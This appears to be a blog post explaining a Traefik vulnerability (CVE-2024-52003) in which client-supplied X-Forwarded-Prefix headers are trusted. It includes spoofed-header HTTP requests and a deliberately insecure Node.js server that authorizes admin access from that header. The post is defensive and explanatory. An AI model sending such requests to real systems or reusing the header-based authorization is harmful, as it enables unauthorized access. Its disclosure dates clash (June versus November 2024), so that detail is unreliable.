CVE-2024-52003 - Traefik ‘X-Forwarded-Prefix’ Header Vulnerability Explained with Exploit Example
Traefik (pronounced "traffic") is an open-source HTTP reverse proxy and load balancer, widely used to route requests to microservices and applications. In June 2024, security researchers publicly disclosed a new vulnerability affecting Traefik: CVE-2024-52003. This post gives a concise walkthrough of the CVE, with code snippets, a demonstration exploit, and what you need to know to keep your systems safe.
What is the CVE About?
The vulnerability affects how Traefik processes the X-Forwarded-Prefix HTTP header. Typically, this header is supplied by a trusted proxy to denote the path prefix before a request reaches Traefik. Prior to patch versions, Traefik would trust this header even if sent by untrusted end users, potentially allowing clients to manipulate internal routing or even bypass security controls.
Original References
- GitHub Advisory: GHSA-pfx2-gx8p-9fj7
- CVE-2024-52003 entry at cve.org
- Traefik release notes
Affected Versions
- Traefik v3: all versions before 3.2.1
All users running affected versions and exposing Traefik to untrusted clients may be at risk.
How the Vulnerability Works
Normally, only trusted proxies should add the X-Forwarded-Prefix header. Affected Traefik versions trusted the header regardless of its source, meaning *any* client could add it to a request and have it passed to the backend as if a trusted proxy had set it.
Potential Exploits
Imagine you have a backend route at /admin that’s protected, and normal users should only get access to /user. With this vulnerability, a malicious user might send:
```http
GET /user HTTP/1.1
Host: myapp.example.com
X-Forwarded-Prefix: /admin
```
If the backend blindly trusts the X-Forwarded-Prefix provided by Traefik, it could serve up admin content to a normal user.
Example Malicious Request (Exploit Snippet)
```http
GET /profile HTTP/1.1
Host: app.example.com
X-Forwarded-Prefix: /admin
```
This tricks backend logic into thinking the client is on /admin/profile.
Here’s a simple Node.js server illustrating what could happen:
```javascript
const http = require('http');

const server = http.createServer((req, res) => {
  // Node lower-cases incoming header names; this value is attacker-controlled
  // when the proxy in front of it forwards X-Forwarded-Prefix unchecked.
  const prefix = req.headers['x-forwarded-prefix'] || '';
  if (prefix.startsWith('/admin')) {
    // Authorization decided purely from the forwarded prefix: the flaw.
    res.end('Hello, Admin!');
  } else {
    res.end('Hello, User!');
  }
});

server.listen(8080);
```
By sending a request with X-Forwarded-Prefix: /admin, any user can get admin-level access.
No Known Workarounds
As per the official GitHub advisory, there are no safe temporary mitigations or workarounds for CVE-2024-52003. Filtering or removing the header upstream is not always possible or reliable.
How to Fix
Immediate action:
- Upgrade to Traefik v3.2.1 (if you’re on v3).
- Get the latest versions from Traefik’s releases page.
Wrapping Up
CVE-2024-52003 is a critical, easy-to-exploit bug in Traefik’s handling of X-Forwarded-Prefix. There’s no reliable workaround, so don’t delay—upgrade to the latest Traefik now.
Stay safe—use only trusted headers, upgrade your infrastructure regularly, and monitor your logs!
Timeline
Published on: 11/29/2024 19:15:08 UTC